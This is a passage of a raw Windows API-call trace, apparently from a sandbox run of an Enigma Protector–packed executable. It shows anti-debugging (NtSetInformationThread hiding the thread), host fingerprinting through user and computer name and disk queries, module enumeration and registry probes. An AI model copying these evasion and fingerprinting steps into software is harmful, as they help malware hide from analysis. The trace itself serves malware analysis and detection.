dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.433] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.433] GetLastError () returned 0x12 [0164.433] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.433] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.433] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.434] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.435] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fda8*="c:\\Users\\kEecfMwgj") returned 1 [0164.435] SysReAllocStringLen (in: pbstr=0x28fdac*=0x0, psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fdac*="c:\\Users\\kEecfMwgj") returned 1 [0164.435] SysReAllocStringLen (in: pbstr=0x2b10090*=0x0, psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x2b10090*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.435] VirtualFree (lpAddress=0x2b14000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0164.439] GetLastError () returned 0x0 [0164.444] SetLastError (dwErrCode=0x0) [0164.444] GetLastError () returned 0x0 [0164.444] SetLastError (dwErrCode=0x0) [0164.444] GetLastError () returned 0x0 [0164.444] SetLastError (dwErrCode=0x0) [0164.445] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0164.445] GetProcAddress (hModule=0x77a60000, lpProcName="NtSetInformationThread") returned 0x77a7f99c [0164.445] GetCurrentThread () returned 0xfffffffe [0164.445] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0164.446] GetLastError () returned 0x0 [0164.446] SetLastError (dwErrCode=0x0) [0164.446] GetLastError () returned 0x0 [0164.446] SetLastError (dwErrCode=0x0) [0164.446] GetLastError () returned 0x0 [0164.446] SetLastError (dwErrCode=0x0) [0164.447] GetLastError () returned 0x0 [0164.447] SetLastError (dwErrCode=0x0) [0164.447] GetLastError () returned 0x0 [0164.447] SetLastError (dwErrCode=0x0) [0164.447] GetLastError () returned 0x0 [0164.447] SetLastError (dwErrCode=0x0) [0164.447] GetLastError () returned 0x0 [0164.448] SetLastError (dwErrCode=0x0) [0164.448] GetLastError () returned 0x0 [0164.448] SetLastError (dwErrCode=0x0) [0164.448] GetLastError () returned 0x0 [0164.448] SetLastError (dwErrCode=0x0) [0164.448] GetLastError () returned 0x0 [0164.449] SetLastError (dwErrCode=0x0) [0164.449] GetLastError () returned 0x0 [0164.449] SetLastError (dwErrCode=0x0) [0164.449] GetLastError () returned 0x0 [0164.449] SetLastError (dwErrCode=0x0) [0164.449] GetLastError () returned 0x0 [0164.450] SetLastError (dwErrCode=0x0) [0164.450] GetLastError () returned 0x0 [0164.450] SetLastError (dwErrCode=0x0) [0164.450] GetLastError () returned 0x0 [0164.450] SetLastError (dwErrCode=0x0) [0164.471] GetLastError () returned 0x0 [0164.472] SetLastError (dwErrCode=0x0) [0164.472] GetLastError () returned 0x0 [0164.475] SetLastError (dwErrCode=0x0) [0164.475] GetLastError () returned 0x0 [0164.475] SetLastError (dwErrCode=0x0) [0164.475] GetLastError () returned 0x0 [0164.475] SetLastError (dwErrCode=0x0) [0164.475] GetLastError () returned 0x0 [0164.475] SetLastError (dwErrCode=0x0) [0164.475] GetLastError () returned 0x0 [0164.475] SetLastError (dwErrCode=0x0) [0164.476] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2c000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.476] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.476] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.476] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0164.476] GetLastError () returned 0x0 [0164.476] SetLastError (dwErrCode=0x0) [0164.476] GetLastError () returned 0x0 [0164.476] SetLastError (dwErrCode=0x0) [0164.476] GetLastError () returned 0x0 [0164.476] SetLastError (dwErrCode=0x0) [0164.476] GetUserNameA (in: lpBuffer=0x557338, pcbBuffer=0x557334 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x557334) returned 1 [0164.482] GetLastError () returned 0x0 [0164.482] SetLastError (dwErrCode=0x0) [0164.482] GetLastError () returned 0x0 [0164.482] SetLastError (dwErrCode=0x0) [0164.482] GetLastError () returned 0x0 [0164.483] SetLastError (dwErrCode=0x0) [0164.483] GetLastError () returned 0x0 [0164.483] SetLastError (dwErrCode=0x0) [0164.483] GetLastError () returned 0x0 [0164.483] SetLastError (dwErrCode=0x0) [0164.483] GetLastError () returned 0x0 [0164.483] SetLastError (dwErrCode=0x0) [0164.483] GetComputerNameA (in: lpBuffer=0x55744c, nSize=0x557448 | out: lpBuffer="Q9IATRKPRH", nSize=0x557448) returned 1 [0164.484] GetLastError () returned 0xcb [0164.484] SetLastError (dwErrCode=0xcb) [0164.484] GetLastError () returned 0xcb [0164.484] SetLastError (dwErrCode=0xcb) [0164.484] GetLastError () returned 0xcb [0164.485] SetLastError (dwErrCode=0xcb) [0164.485] GetLastError () returned 0xcb [0164.485] SetLastError (dwErrCode=0xcb) [0164.485] GetLastError () returned 0xcb [0164.485] SetLastError (dwErrCode=0xcb) [0164.485] GetLastError () returned 0xcb [0164.485] SetLastError (dwErrCode=0xcb) [0164.485] GetLastError () returned 0xcb [0164.486] SetLastError (dwErrCode=0xcb) [0164.486] GetLastError () returned 0xcb [0164.486] SetLastError (dwErrCode=0xcb) [0164.486] GetLastError () returned 0xcb [0164.486] SetLastError (dwErrCode=0xcb) [0164.486] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x", cbMultiByte=43, lpWideCharStr=0x28ee68, cchWideChar=2047 | out: lpWideCharStr="Software\\Enigma Protector\\%.8x%.8x-%.8x%.8x") returned 43 [0164.486] GetLastError () returned 0x0 [0164.486] SetLastError (dwErrCode=0x0) [0164.489] GetLastError () returned 0x0 [0164.489] SetLastError (dwErrCode=0x0) [0164.489] GetLastError () returned 0x0 [0164.489] SetLastError (dwErrCode=0x0) [0164.489] GetLastError () returned 0x0 [0164.489] SetLastError (dwErrCode=0x0) [0164.489] GetLastError () returned 0x0 [0164.490] SetLastError (dwErrCode=0x0) [0164.490] GetLastError () returned 0x0 [0164.490] SetLastError (dwErrCode=0x0) [0164.490] GetLastError () returned 0x0 [0164.490] SetLastError (dwErrCode=0x0) [0164.490] SysReAllocStringLen (in: pbstr=0x2ae1c74*=0x0, psz="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E", len=0x3b | out: pbstr=0x2ae1c74*="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E") returned 1 [0164.490] GetLastError () returned 0x0 [0164.490] SetLastError (dwErrCode=0x0) [0164.490] GetLastError () returned 0x0 [0164.491] SetLastError (dwErrCode=0x0) [0164.491] GetLastError () returned 0x0 [0164.491] SetLastError (dwErrCode=0x0) [0164.491] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x2c000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.491] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.491] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.491] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0164.491] GetLastError () returned 0x0 [0164.491] SetLastError (dwErrCode=0x0) [0164.491] GetLastError () returned 0x0 [0164.491] SetLastError (dwErrCode=0x0) [0164.491] GetLastError () returned 0x0 [0164.492] SetLastError (dwErrCode=0x0) [0164.492] GetWindowsDirectoryA (in: lpBuffer=0x28fcfb, uSize=0x105 | out: lpBuffer="C:\\Windows") returned 0xa [0164.492] CreateFileA (lpFileName="\\\\.\\C:" (normalized: "c:"), dwDesiredAccess=0x0, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0164.492] DeviceIoControl (in: hDevice=0x11c, dwIoControlCode=0x2d1400, lpInBuffer=0x28fe00*, nInBufferSize=0xc, lpOutBuffer=0x2b101a8, nOutBufferSize=0x2710, lpBytesReturned=0x28fe10, lpOverlapped=0x0 | out: lpInBuffer=0x28fe00*, lpOutBuffer=0x2b101a8*, lpBytesReturned=0x28fe10*=0xa7, lpOverlapped=0x0) returned 1 [0164.493] CloseHandle (hObject=0x11c) returned 1 [0164.494] GetLastError () returned 0x0 [0164.494] SetLastError (dwErrCode=0x0) [0164.494] GetLastError () returned 0x0 [0164.494] SetLastError (dwErrCode=0x0) [0164.494] GetLastError () returned 0x0 [0164.494] SetLastError (dwErrCode=0x0) [0164.494] GetLastError () returned 0x0 [0164.494] SetLastError (dwErrCode=0x0) [0164.494] GetLastError () returned 0x0 [0164.495] SetLastError (dwErrCode=0x0) [0164.495] GetLastError () returned 0x0 [0164.495] SetLastError (dwErrCode=0x0) [0164.495] GetLastError () returned 0x0 [0164.495] SetLastError (dwErrCode=0x0) [0164.495] GetLastError () returned 0x0 [0164.495] SetLastError (dwErrCode=0x0) [0164.495] GetLastError () returned 0x0 [0164.495] SetLastError (dwErrCode=0x0) [0164.496] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.496] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.496] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.497] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.497] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.497] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.497] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.498] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.498] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.498] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f484, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0164.499] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.499] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.499] GetLastError () returned 0x0 [0164.499] SetLastError (dwErrCode=0x0) [0164.499] GetLastError () returned 0x0 [0164.500] SetLastError (dwErrCode=0x0) [0164.500] GetLastError () returned 0x0 [0164.500] SetLastError (dwErrCode=0x0) [0164.500] GetCurrentProcessId () returned 0xbac [0164.500] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0164.500] GetProcAddress (hModule=0x75a80000, lpProcName="CreateToolhelp32Snapshot") returned 0x75ab7327 [0164.500] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32ListFirst") returned 0x75b15bc1 [0164.500] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32ListNext") returned 0x75b15c6b [0164.501] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32First") returned 0x75b15d03 [0164.501] GetProcAddress (hModule=0x75a80000, lpProcName="Heap32Next") returned 0x75b15eee [0164.501] GetProcAddress (hModule=0x75a80000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x75b160f3 [0164.501] GetProcAddress (hModule=0x75a80000, lpProcName="Process32First") returned 0x75ab8abb [0164.501] GetProcAddress (hModule=0x75a80000, lpProcName="Process32Next") returned 0x75ab8812 [0164.501] GetProcAddress (hModule=0x75a80000, lpProcName="Process32FirstW") returned 0x75ab8b83 [0164.501] GetProcAddress (hModule=0x75a80000, lpProcName="Process32NextW") returned 0x75ab88da [0164.502] GetProcAddress (hModule=0x75a80000, lpProcName="Thread32First") returned 0x75b16133 [0164.502] GetProcAddress (hModule=0x75a80000, lpProcName="Thread32Next") returned 0x75b161df [0164.502] GetProcAddress (hModule=0x75a80000, lpProcName="Module32First") returned 0x75b16279 [0164.502] GetProcAddress (hModule=0x75a80000, lpProcName="Module32Next") returned 0x75b16362 [0164.505] GetProcAddress (hModule=0x75a80000, lpProcName="Module32FirstW") returned 0x75ab79c1 [0164.505] GetProcAddress (hModule=0x75a80000, lpProcName="Module32NextW") returned 0x75ab7d5e [0164.505] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xbac) returned 0x120 [0164.508] Module32First (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.508] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.509] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.510] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.511] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.512] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.513] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.514] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.515] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.516] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.516] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.517] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.521] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.521] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.522] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.523] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.524] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.525] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.525] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.526] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.527] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.528] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.528] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.529] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.530] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.531] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 1 [0164.531] Module32Next (hSnapshot=0x120, lpme=0x28fc48) returned 0 [0164.532] CloseHandle (hObject=0x120) returned 1 [0164.532] GetLastError () returned 0x12 [0164.532] SetLastError (dwErrCode=0x12) [0164.532] GetLastError () returned 0x12 [0164.532] SetLastError (dwErrCode=0x12) [0164.532] GetLastError () returned 0x12 [0164.533] SetLastError (dwErrCode=0x12) [0164.533] GetLastError () returned 0x12 [0164.533] SetLastError (dwErrCode=0x12) [0164.533] GetLastError () returned 0x12 [0164.533] SetLastError (dwErrCode=0x12) [0164.533] GetLastError () returned 0x12 [0164.536] SetLastError (dwErrCode=0x12) [0164.536] GetLastError () returned 0x12 [0164.536] SetLastError (dwErrCode=0x12) [0164.536] GetLastError () returned 0x12 [0164.537] SetLastError (dwErrCode=0x12) [0164.537] GetLastError () returned 0x12 [0164.537] SetLastError (dwErrCode=0x12) [0164.537] GetLastError () returned 0x12 [0164.537] SetLastError (dwErrCode=0x12) [0164.537] GetLastError () returned 0x12 [0164.537] SetLastError (dwErrCode=0x12) [0164.537] GetLastError () returned 0x12 [0164.537] SetLastError (dwErrCode=0x12) [0164.537] GetLastError () returned 0x12 [0164.537] SetLastError (dwErrCode=0x12) [0164.537] GetLastError () returned 0x12 [0164.537] SetLastError (dwErrCode=0x12) [0164.538] GetLastError () returned 0x12 [0164.538] SetLastError (dwErrCode=0x12) [0164.538] GetLastError () returned 0x12 [0164.538] SetLastError (dwErrCode=0x12) [0164.538] GetLastError () returned 0x12 [0164.538] SetLastError (dwErrCode=0x12) [0164.538] GetLastError () returned 0x12 [0164.538] SetLastError (dwErrCode=0x12) [0164.538] GetLastError () returned 0x12 [0164.538] SetLastError (dwErrCode=0x12) [0164.539] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.539] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.539] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.539] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.540] RtlUnwind (TargetFrame=0x28fe5c, TargetIp=0x430828, ExceptionRecord=0x28f9a8, ReturnValue=0x0) [0164.540] GetLastError () returned 0x0 [0164.540] SetLastError (dwErrCode=0x0) [0164.540] GetLastError () returned 0x0 [0164.540] SetLastError (dwErrCode=0x0) [0164.540] GetLastError () returned 0x0 [0164.540] SetLastError (dwErrCode=0x0) [0164.540] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.540] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.540] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.541] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0164.541] GetLastError () returned 0x0 [0164.541] SetLastError (dwErrCode=0x0) [0164.541] GetLastError () returned 0x0 [0164.541] SetLastError (dwErrCode=0x0) [0164.541] GetLastError () returned 0x0 [0164.541] SetLastError (dwErrCode=0x0) [0164.541] GetLastError () returned 0x0 [0164.541] SetLastError (dwErrCode=0x0) [0164.541] GetLastError () returned 0x0 [0164.541] SetLastError (dwErrCode=0x0) [0164.541] GetLastError () returned 0x0 [0164.541] SetLastError (dwErrCode=0x0) [0164.542] GetLastError () returned 0x0 [0164.542] SetLastError (dwErrCode=0x0) [0164.542] GetLastError () returned 0x0 [0164.542] SetLastError (dwErrCode=0x0) [0164.542] GetLastError () returned 0x0 [0164.542] SetLastError (dwErrCode=0x0) [0164.542] GetLastError () returned 0x0 [0164.542] SetLastError (dwErrCode=0x0) [0164.542] GetLastError () returned 0x0 [0164.542] SetLastError (dwErrCode=0x0) [0164.542] GetLastError () returned 0x0 [0164.542] SetLastError (dwErrCode=0x0) [0164.543] GetLastError () returned 0x0 [0164.543] SetLastError (dwErrCode=0x0) [0164.543] GetLastError () returned 0x0 [0164.543] SetLastError (dwErrCode=0x0) [0164.543] GetLastError () returned 0x0 [0164.543] SetLastError (dwErrCode=0x0) [0164.543] GetLastError () returned 0x0 [0164.543] SetLastError (dwErrCode=0x0) [0164.543] GetLastError () returned 0x0 [0164.543] SetLastError (dwErrCode=0x0) [0164.543] GetLastError () returned 0x0 [0164.544] SetLastError (dwErrCode=0x0) [0164.544] GetLastError () returned 0x0 [0164.544] SetLastError (dwErrCode=0x0) [0164.544] GetLastError () returned 0x0 [0164.544] SetLastError (dwErrCode=0x0) [0164.544] GetLastError () returned 0x0 [0164.544] SetLastError (dwErrCode=0x0) [0164.544] GetLastError () returned 0x0 [0164.544] SetLastError (dwErrCode=0x0) [0164.544] GetLastError () returned 0x0 [0164.544] SetLastError (dwErrCode=0x0) [0164.544] GetLastError () returned 0x0 [0164.545] SetLastError (dwErrCode=0x0) [0164.545] GetLastError () returned 0x0 [0164.545] SetLastError (dwErrCode=0x0) [0164.545] GetLastError () returned 0x0 [0164.545] SetLastError (dwErrCode=0x0) [0164.545] GetLastError () returned 0x0 [0164.545] SetLastError (dwErrCode=0x0) [0164.545] GetLastError () returned 0x0 [0164.545] SetLastError (dwErrCode=0x0) [0164.545] GetLastError () returned 0x0 [0164.546] SetLastError (dwErrCode=0x0) [0164.546] GetLastError () returned 0x0 [0164.546] SetLastError (dwErrCode=0x0) [0164.546] GetLastError () returned 0x0 [0164.546] SetLastError (dwErrCode=0x0) [0164.546] GetLastError () returned 0x0 [0164.546] SetLastError (dwErrCode=0x0) [0164.546] GetLastError () returned 0x0 [0164.546] SetLastError (dwErrCode=0x0) [0164.546] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x3000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.546] VirtualQuery (in: lpAddress=0x423000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x423000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0xa000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.546] VirtualQuery (in: lpAddress=0x425000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x425000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x8000, State=0x1000, Protect=0x80, Type=0x1000000)) returned 0x1c [0164.547] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x28fe50, dwLength=0x1c | out: lpBuffer=0x28fe50*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000)) returned 0x1c [0164.547] GetLastError () returned 0x0 [0164.547] SetLastError (dwErrCode=0x0) [0164.547] GetLastError () returned 0x0 [0164.547] SetLastError (dwErrCode=0x0) [0164.547] GetLastError () returned 0x0 [0164.547] SetLastError (dwErrCode=0x0) [0164.548] WideCharToMultiByte (in: CodePage=0x3, dwFlags=0x0, lpWideCharStr="SOFTWARE\\EnigmaDevelopers", cchWideChar=25, lpMultiByteStr=0x28eda8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\EnigmaDevelopers§©w", lpUsedDefaultChar=0x0) returned 25 [0164.548] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\EnigmaDevelopers", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fdac | out: phkResult=0x28fdac*=0x0) returned 0x2 [0164.548] GetLastError () returned 0x0 [0164.548] SetLastError (dwErrCode=0x0) [0164.548] GetLastError () returned 0x0 [0164.548] SetLastError (dwErrCode=0x0) [0164.548] GetLastError () returned 0x0 [0164.549] SetLastError (dwErrCode=0x0) [0164.549] GetLastError () returned 0x0 [0164.549] SetLastError (dwErrCode=0x0) [0164.549] GetLastError () returned 0x0 [0164.549] SetLastError (dwErrCode=0x0) [0164.549] GetLastError () returned 0x0 [0164.549] SetLastError (dwErrCode=0x0) [0164.549] GetLastError () returned 0x0 [0164.549] SetLastError (dwErrCode=0x0) [0164.549] GetLastError () returned 0x0 [0164.550] SetLastError (dwErrCode=0x0) [0164.550] GetLastError () returned 0x0 [0164.550] SetLastError (dwErrCode=0x0) [0164.550] GetLocalTime (in: lpSystemTime=0x28fdcc | out: lpSystemTime=0x28fdcc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x17c)) [0164.550] GetLocalTime (in: lpSystemTime=0x28fdcc | out: lpSystemTime=0x28fdcc*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x17c)) [0164.553] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="80EB2F5C", cbMultiByte=8, lpWideCharStr=0x28edd8, cchWideChar=2047 | out: lpWideCharStr="80EB2F5C䕁㑂ぁ㘳㜵㔵㙆䈭㘸䌲䕁㠹䔴㑁い居㈰う䘱㔵䄳ㄱ䐲䕃〭䌰䐹㍂䌸㠱㕄䑆┱ĉ(䘨睝◤ĉ(V") returned 8 [0164.554] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x18c)) [0164.554] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x18c)) [0164.554] GetLocalTime (in: lpSystemTime=0x28fd28 | out: lpSystemTime=0x28fd28*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1b, wSecond=0x0, wMilliseconds=0x18c)) [0164.554] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Enigma Protector\\29AEB4A0365755F6-B862CAE984EA4D0E\\02F01F553A112DCE-00C9DB38C18D5FD1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fce4 | out: phkResult=0x28fce4*=0x0) returned 0x2 [0164.554] CreateFileW (lpFileName="c:\\users\\keecfmwgj\\appdata\\local\\temp\\80EB2F5C" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\80eb2f5c"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0164.554] GetLocalTime (in: 